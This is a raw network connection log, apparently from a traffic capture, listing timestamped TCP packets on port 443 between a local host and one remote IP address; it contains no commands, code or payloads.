                                                                                                                                                                                  Nov 23, 2024 14:47:38.883016109 CET49889443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:38.883054972 CET4434988913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:38.883127928 CET49889443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:38.883282900 CET49889443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:38.883318901 CET4434988913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:38.899846077 CET4434988513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:38.899904013 CET4434988513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:38.899943113 CET49885443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:38.900156021 CET49885443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:38.900166988 CET4434988513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:38.900199890 CET49885443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:38.900204897 CET4434988513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:38.903387070 CET49890443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:38.903430939 CET4434989013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:38.903491974 CET49890443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:38.903616905 CET49890443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:38.903635979 CET4434989013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:38.905987024 CET4434988613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:38.906023026 CET4434988613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:38.906061888 CET49886443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:38.906068087 CET4434988613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:38.906199932 CET49886443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:38.906207085 CET4434988613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:38.906214952 CET49886443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:38.906369925 CET4434988613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:38.906413078 CET4434988613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:38.906444073 CET49886443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:38.908515930 CET49891443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:38.908550024 CET4434989113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:38.908860922 CET49891443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:38.909189939 CET49891443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:38.909202099 CET4434989113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:39.054061890 CET4434988713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:39.054085016 CET4434988713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:39.054147005 CET49887443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:39.054157019 CET4434988713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:39.054193974 CET49887443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:39.054435015 CET49887443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:39.054439068 CET4434988713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:39.054459095 CET49887443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:39.054588079 CET4434988713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:39.054615021 CET4434988713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:39.054663897 CET49887443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:39.057442904 CET49892443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:39.057480097 CET4434989213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:39.057549000 CET49892443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:39.057732105 CET49892443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:39.057748079 CET4434989213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:40.249989986 CET4434988813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:40.250588894 CET49888443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:40.250662088 CET4434988813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:40.251252890 CET49888443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:40.251270056 CET4434988813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:40.662142992 CET4434988913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:40.662759066 CET49889443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:40.662775993 CET4434988913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:40.663386106 CET49889443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:40.663398027 CET4434988913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:40.686326027 CET4434989013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:40.686755896 CET49890443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:40.686824083 CET4434989013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:40.687208891 CET49890443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:40.687226057 CET4434989013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:40.693979979 CET4434988813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:40.694036007 CET4434988813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:40.694104910 CET49888443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:40.694143057 CET4434988813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:40.694221973 CET49888443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:40.694252968 CET4434988813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:40.694278002 CET49888443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:40.694596052 CET4434988813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:40.694679976 CET4434988813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:40.694731951 CET49888443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:40.697395086 CET49893443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:40.697442055 CET4434989313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:40.697510004 CET49893443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:40.697683096 CET49893443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:40.697695017 CET4434989313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:40.698410988 CET4434989113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:40.698805094 CET49891443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:40.698822021 CET4434989113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:40.699330091 CET49891443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:40.699338913 CET4434989113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:40.773902893 CET4434989213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:40.774704933 CET49892443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:40.774727106 CET4434989213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:40.775274992 CET49892443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:40.775279999 CET4434989213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:41.108757019 CET4434988913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:41.111809015 CET4434988913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:41.111895084 CET49889443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:41.111959934 CET49889443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:41.111959934 CET49889443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:41.111980915 CET4434988913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:41.111990929 CET4434988913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:41.115019083 CET49894443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:41.115061998 CET4434989413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:41.115341902 CET49894443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:41.115341902 CET49894443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:41.115374088 CET4434989413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:41.130417109 CET4434989013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:41.133585930 CET4434989013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:41.133660078 CET49890443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:41.141000986 CET4434989113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:41.144195080 CET4434989113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:41.144262075 CET49891443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:41.160132885 CET49890443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:41.160134077 CET49890443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:41.160208941 CET4434989013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:41.160242081 CET4434989013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:41.207344055 CET49891443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:41.207374096 CET4434989113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:41.207386971 CET49891443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:41.207396984 CET4434989113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:41.208540916 CET4434989213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:41.211555004 CET49895443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:41.211612940 CET4434989513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:41.211678982 CET49895443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:41.211940050 CET4434989213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:41.212001085 CET49892443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:41.212189913 CET49896443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:41.212235928 CET4434989613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:41.212299109 CET49896443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:41.212491035 CET49895443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:41.212507010 CET4434989513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:41.212522030 CET49892443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:41.212546110 CET4434989213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:41.212559938 CET49892443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:41.212564945 CET4434989213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:41.214272976 CET49897443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:41.214307070 CET4434989713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:41.214370012 CET49897443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:41.214474916 CET49897443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:41.214485884 CET4434989713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:41.214617014 CET49896443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:41.214633942 CET4434989613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:42.501267910 CET4434989313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:42.504025936 CET49893443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:42.504046917 CET4434989313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:42.504499912 CET49893443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:42.504504919 CET4434989313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:42.919703960 CET4434989413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:42.920341969 CET49894443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:42.920377016 CET4434989413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:42.920803070 CET49894443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:42.920811892 CET4434989413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:42.931308985 CET4434989613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:42.931777954 CET49896443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:42.931859970 CET4434989613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:42.932272911 CET49896443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:42.932287931 CET4434989613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:42.946281910 CET4434989313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:42.949392080 CET4434989313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:42.949470997 CET49893443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:42.949542046 CET49893443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:42.949562073 CET4434989313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:42.949573994 CET49893443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:42.949579000 CET4434989313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:42.952454090 CET49898443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:42.952493906 CET4434989813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:42.952580929 CET49898443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:42.952730894 CET49898443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:42.952747107 CET4434989813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:43.084208965 CET4434989513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:43.085041046 CET49895443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:43.085076094 CET4434989513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:43.085316896 CET4434989713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:43.085434914 CET49895443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:43.085439920 CET4434989513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:43.085671902 CET49897443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:43.085692883 CET4434989713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:43.086002111 CET49897443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:43.086008072 CET4434989713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:43.363187075 CET4434989413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:43.363364935 CET4434989413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:43.363420010 CET49894443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:43.363588095 CET49894443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:43.363606930 CET4434989413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:43.363617897 CET49894443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:43.363624096 CET4434989413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:43.365144014 CET4434989613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:43.366698980 CET49899443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:43.366739988 CET4434989913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:43.366808891 CET49899443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:43.366981030 CET49899443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:43.366992950 CET4434989913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:43.368462086 CET4434989613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:43.368525028 CET49896443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:43.368616104 CET49896443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:43.368617058 CET49896443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:43.368655920 CET4434989613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:43.368685007 CET4434989613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:43.370913982 CET49900443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:43.370984077 CET4434990013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:43.371072054 CET49900443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:43.371212959 CET49900443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:43.371246099 CET4434990013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:43.538487911 CET4434989713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:43.541882038 CET4434989713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:43.542076111 CET49897443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:43.542076111 CET49897443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:43.544753075 CET49897443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:43.544759989 CET49901443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:43.544765949 CET4434989713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:43.544781923 CET4434990113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:43.544883013 CET49901443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:43.545041084 CET49901443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:43.545053005 CET4434990113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:43.569844961 CET4434989513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:43.572887897 CET4434989513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:43.572977066 CET49895443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:43.574110985 CET49895443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:43.574124098 CET4434989513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:43.574134111 CET49895443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:43.574140072 CET4434989513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:43.577409983 CET49902443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:43.577510118 CET4434990213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:43.577641010 CET49902443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:43.577708006 CET49902443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:43.577728987 CET4434990213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:44.733711004 CET4434989813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:44.734322071 CET49898443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:44.734406948 CET4434989813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:44.734826088 CET49898443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:44.734841108 CET4434989813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:45.081533909 CET4434989913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:45.081996918 CET49899443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:45.082015038 CET4434989913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:45.082467079 CET49899443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:45.082472086 CET4434989913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:45.089759111 CET4434990013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:45.090189934 CET49900443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:45.090226889 CET4434990013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:45.090753078 CET49900443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:45.090759993 CET4434990013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:45.178589106 CET4434989813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:45.181582928 CET4434989813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:45.181683064 CET49898443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:45.181749105 CET49898443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:45.181749105 CET49898443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:45.181781054 CET4434989813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:45.181806087 CET4434989813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:45.184760094 CET49903443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:45.184806108 CET4434990313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:45.184885979 CET49903443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:45.185029030 CET49903443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:45.185049057 CET4434990313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:45.330233097 CET4434990113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:45.330873966 CET49901443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:45.330899954 CET4434990113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:45.331485987 CET49901443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:45.331496954 CET4434990113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:45.358092070 CET4434990213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:45.358524084 CET49902443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:45.358594894 CET4434990213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:45.359041929 CET49902443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:45.359057903 CET4434990213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:45.515794039 CET4434989913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:45.518985987 CET4434989913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:45.519033909 CET4434989913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:45.519038916 CET49899443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:45.519083023 CET49899443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:45.519139051 CET49899443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:45.519156933 CET4434989913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:45.519167900 CET49899443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:45.519172907 CET4434989913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:45.522039890 CET49904443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:45.522061110 CET4434990413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:45.522135019 CET49904443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:45.522270918 CET49904443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:45.522284031 CET4434990413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:45.525758982 CET4434990013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:45.528791904 CET4434990013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:45.528887033 CET49900443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:45.528974056 CET49900443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:45.528974056 CET49900443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:45.529019117 CET4434990013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:45.529046059 CET4434990013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:45.531932116 CET49905443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:45.532020092 CET4434990513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:45.532125950 CET49905443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:45.532335043 CET49905443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:45.532370090 CET4434990513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:45.772320032 CET4434990113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:45.775747061 CET4434990113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:45.775800943 CET49901443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:45.775823116 CET4434990113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:45.775870085 CET4434990113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:45.775913954 CET49901443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:45.775934935 CET49901443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:45.775948048 CET4434990113.107.246.63192.168.2.4
